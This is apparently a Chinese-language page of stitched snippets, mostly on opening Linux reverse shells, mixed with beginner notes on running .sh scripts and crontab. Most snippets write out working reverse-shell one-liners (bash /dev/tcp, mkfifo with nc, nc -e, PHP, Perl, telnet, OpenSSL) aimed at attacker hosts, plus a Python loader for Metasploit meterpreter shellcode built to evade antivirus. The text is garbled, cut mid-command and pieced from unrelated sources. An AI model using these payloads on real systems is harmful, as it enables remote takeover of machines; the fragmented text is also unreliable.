bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的...IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp...2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令 1.2second bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式...&1 2>&1 和上面的效果一样 1.4fourth bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 值得一提的是,">&"相当于"2>&1",标准错误输出 一个标准的反弹
Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它能运行主要的UNIX工具软件、应用程序和网络协议。...Linux继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统。linux中.sh文件是什么?linux中.sh文件是脚本文件,一般都是bash脚本。...想运行的话就用sh命令运行sh xxx.sh。注:sh或是执行脚本,或是切换到sh这个bash里,默认的shell是bash。...当然,linux中sh是链接到bash上的,所以sh与bash在功能上是没有区别的。...还有就是在执行脚本的时候是用sh + 脚本名的方式来执行,其实,大部分的时候,简单脚本只要权限设置正确,可以直接执行,不需要sh命令的。
二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....使用 bash -i &> /dev/tcp/10.42.0.1 0<&1 同样能反弹一个可交互的shell。...最后建立了一个子进程,传入参数“-i”使bash以交互模式启动。这个时候我们的输入输出都会被重定向到socket,黑客就可以执行命令了。 我们可以看到成功的弹回了一个shell
/加上文件名.sh,如运行hello.sh为..../hello.sh【hello.sh必须有x权限】 二、直接sh 加上文件名.sh,如运行hello.sh为sh hello.sh【hello.sh可以没有x权限】 方法一:绝对路径执行.sh文件.../home/test/shell/hello.sh /home/test/shell/hello.sh sh /home/test/shell/hello.sh 方法二:当前目录执行.sh文件 1、cd...到.sh文件所在目录 比如以hello.sh文件为例,如下 2、给.sh文件添加x执行权限 比如以hello.sh文件为例,chmod u+x hello.sh,如下图 3、..../hello.sh 即可执行hello.sh文件,如下图 4、sh 执行.sh文件 以hello.sh文件为例,sh hello.sh即可执行hello.sh文件,如下图 注:用“./”加文件名.sh
通过本文我们一起来看看Linux如何反弹shell。...实验环境 kali Linux (内外:192.168.5.139) Centos8 (腾讯云:123.6.44.67) 姿势一 bash反弹 首先,使用nc在外网主机上监听端口: nc -lvp 9090.../是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接, >&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件...可以看到远程已经成功反弹到了shell,并且可以执行命令。...姿势四 php反弹 使用php反弹shell,方法如下 。
/bin/sh或者#!/bin/bash 符号#!用来告诉系统它后面的参数是用来执行该文件的程序。在这个例子中我们使用/bin/sh来执行程序。.../filename 来运行(如:chmod +x 123.sh,./123.sh) 二、注释 在进行shell编程时,以#开头的句子表示注释,直到这一行的结束。...1,自动执行jar项目运行的脚本 a,创建脚本文件(test-a.sh) [root@docker_t tools]# touch test-a.sh b,编辑文件 [root@docker_t.../test-a.sh ?.../test-b.sh ?
---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ?...原理其实就是管道技术 参考文章: https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些...Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo.../tmp/f 这里实现的是bind shell,我们希望的是反弹shell,简单变个型吧: rm -f /tmp/f; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2...同样的,我们拆分一下 nc 192.168.1.101 5555 连接192.168.1.101 的 5555 端口 | /bin/sh | 将前面的连接输出传递给 /bin/sh 输入,并将执行的结果输出
目录 一,Shell简介 正向shell(客户端想要获得服务端的shell) 反向shell (服务端想要获得客户端的shell) 二,Linux反弹shell 1.NC正向shell 2.NC...反向shell 编辑 3.bash反弹shell 4.无e参数反弹shell 5.Base64编码绕过 编辑 6.Telnet反弹shell 7.OpenSSL反弹443端口,流量加密传输 一...二,Linux反弹shell 实验环境 目标机器:Ubuntu、IP:10.1.1.200、ssh账号密码root/root 攻击机器:Kali、IP:10.1.1.100 1.NC正向shell.../dev/tcp/10.10.1.11/6666 传递的数据作为交互式shell的输入,命令执行后的结果输出到 /dev/tcp/10.10.1.11/6666 // /dev/tcp/是Linux...openssl s_server -quiet -key key.pem -cert cert.pem -port 443 // 在控制端上启动监视器 被控端: mkfifo /tmp/s;/bin/sh
通常在获得webshell之后,如果是linux的服务器,一般会返回一个shell来对linux服务器做进一步的渗透,如:溢出提权、信息收集等。...下面就说说linux自带的程序来反弹shell的姿势。 自带工具 Bash 针对不同的linux版本,可能有不同的利用方式,这里简单列一下,在使用的时候大家自行测试。...0x01 nc -e /bin/sh 10.0.0.1 1234 0x02 rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1...1234 >/tmp/f 0x03 nc -c /bin/sh attackerip 4444 0x04 /bin/sh | nc attackerip 4444 0x05 rm -f /tmp/p;...mknod /tmp/p p && nc attackerip 4444 0/tmp/p Telnet telnet客户端作为一个远程管理设备的软件,也可以作为反弹shell的软件 0x01 rm -
之前一直看大家在做分离免杀,但大部分都是windows上的,既然学习Linux,就搞一个Linux版本的一句话反弹meterpreter,借用分离免杀的思想:用 Python3 执行 shellcode...payload : linux/x64/meterpreter/reverse_tcp 生成shellcode use payload/linux/x64/meterpreter/reverse_tcp...Return pointer to shell code function in executable memory return function buf = "shellcode" # linux...xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6" # linux...反弹shell章节就此结束。
这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell 目录 0x01 文件描述符 0x02 重定向 0x03 反弹shell 0x04 交互重定向 0x05 命令变形 0x01...文件描述符 Linux的文件描述符有以下三种 标准输入:0 标准输出:1 错误输出:2 对于文件描述符就先知道这些就可以了,具体的使用会在重定向中来说,重定向就是对文件描述符的操作 0x02 重定向...0x03 反弹shell 下面是很常见的一条反弹shell命令,我们就以这个为例来进行解释 bash -i >& /dev/tcp/ip/port 0>&1 解释 bash -i 表示创建一个交互式的...首先我们在本地开启监听,然后在Linux机器上输入下面的命令,即将指定字符发送到192.168.6.1的3333端口 ? ?
,所以再Linux/Windows(不单独罗列了)中出现以下的方式方法 测试环境: AttackIP:Kail 192.168.200.252 ClientIP:Centos 192.168.200.200.../4444; sh &196 2>&196 WeiyiGeek....>&%d 2>&%d",f,f,f)' #可将sh->bash 补充:未复现成功 perl反弹shell perl -e 'use Socket;$i="10.24.87.54";$p=14444...PHP反弹Shell php -r '$sock=fsockopen("192.168.200.252",4444);exec("/bin/sh -i &3 2>&3");' WeiyiGeek...-i &3 2>&3');" NC命令反弹Shell 方式1 #反向连接 nc -e /bin/sh 192.168.200.252 4444 #Client nc -lvvp 4444
最近做了一点和Linux有关的工作,刚刚学习,做一点和shell脚本有关的笔记。...1、创建test.sh文件 touch test.sh 2、编辑sh文件 vi test.sh 3、保存退出 敲击esc, 然后输入 :wq ,回车退出 4、添加可执行权限,当然默认就是可执行的。...chmod +x test.sh 5、运行文件 (1)./test.sh (2)sh test.sh 6、删除文件 rm test.sh
shell中使用source xxx.sh ,是直接运行xxx.sh的命令,不创建子shell,而sh则创建子shell,子shell里面 的变量父shell无法使用,对环境变量的修改也不影响父shell...sh 创建了子shell和当前的shell并行执行,子shell中执行,脚本设置的变量不会影响当前shell。...sh执行脚本 source执行脚本 还有个办法可以在父shell和子shell中分别加上 echo $SHLVL ,显示当前运行层级,可以明显的看出来: 两种执行层级不同 [root@bogon home...]# cat father.sh #!..."source son shell" echo "sh son shell" sh son.sh echo "sh son shell" [root@bogon home]# cat son.sh #
描述:在渗透测试中常常需要进行反弹Shell来证明该漏洞的危害,所以再Linux/Windows(不单独罗列了)中出现以下的方式方法 测试环境: AttackIP:Kail 192.168.200.252.../4444; sh &196 2>&196 ?...>&%d 2>&%d",f,f,f)' #可将sh->bash 补充:未复现成功 perl反弹shell perl -e 'use Socket;$i="10.24.87.54";$p=14444...PHP反弹Shell php -r '$sock=fsockopen("192.168.200.252",4444);exec("/bin/sh -i &3 2>&3");' ?...-i &3 2>&3');" NC命令反弹Shell 方式1 #反向连接 nc -e /bin/sh 192.168.200.252 4444 #Client nc -lvvp 4444
一、linux中.sh文件是什么? linux中.sh文件是脚本文件,一般都是bash脚本。 二、linux中的.sh文件怎么执行? 1、直接..../加上文件名.sh,如运行hello.sh为 ..../hello.sh 【绝对路径下也可以,但hello.sh必须有x权限】 使用绝对路径执行: 对于文件是否具有x权限,可以目录文件夹下(存放当前文件的文件夹)输入 ll...命令查看,没有可使用 chmod u+x hello.sh 2、直接sh 加上文件名.sh,如运行hello.sh为 sh hello.sh【hello.sh可以没有x权限】 版权声明:本文内容由互联网用户自发贡献
msf 中有很多 payload ,我们来看一下可以用来unix 中反弹shell的paylaod 切换到 msf 目录 ....不说了,不说了,记得用 sh cmd/unix/reverse_jjs ?...反弹shell的文章 cmd/unix/reverse_netcat_gaping ?...sh -c '(sleep 3797|openssl s_client -quiet -connect 192.168.1.38:5555|while : ; do sh && break; done...sh -c '(sleep 4119|telnet -z 192.168.1.38 5555|while : ; do sh && break; done 2>&1|telnet -z 192.168.1.38
问题 linux系统是centos 7.x 发现将windows自动打的包发到centos后执行.sh文件出现如下: ?...查询.sh文件的格式,通过vim 打开.sh然后执行如下: :set ff 结果: ? 发现是dos格式是有问题,需要转换成unix。...idea解决方案: 1.打开.sh文件,然后点击右下角CRLF修改为UNIX of OS就OK了 ? 2.在配置文件中,统一添加以下配置 unix ?
crontab是Linux一个定时执行特定任务的程序,网上也有很多使用教程,在这里举一个例子,抛砖引玉。 为了运行.py,建议使用.sh脚本批量运行,并且在.sh内输出日志。...Ubuntu系统crontab设置请参考: https://www.linuxidc.com/Linux/2013-05/84770.htm 建立.sh文件 在目录下新建xxx.sh文件,内容为:.../bin/sh . ~/.bash_profile python /home/price-monitor-server/conn_sql.py ---- 第一行是输出标准日志到crawl_log...第二行是输出标准错误日志到crawl_log_err 第三与第四行是为了实行.sh而设置的环境 第四行及之后就可以执行.py啦 设置crontab 在/var/spool/cron/(你的用户名)文件中添加一行...: */15 * * * * cd /home/xxxxx && sh crawl_item.sh 代表每15分钟去往/home/xxxxxx目录执行一次crawl_item.sh 由于日志在.sh中已经输出
领取专属 10元无门槛券
手把手带您无忧上云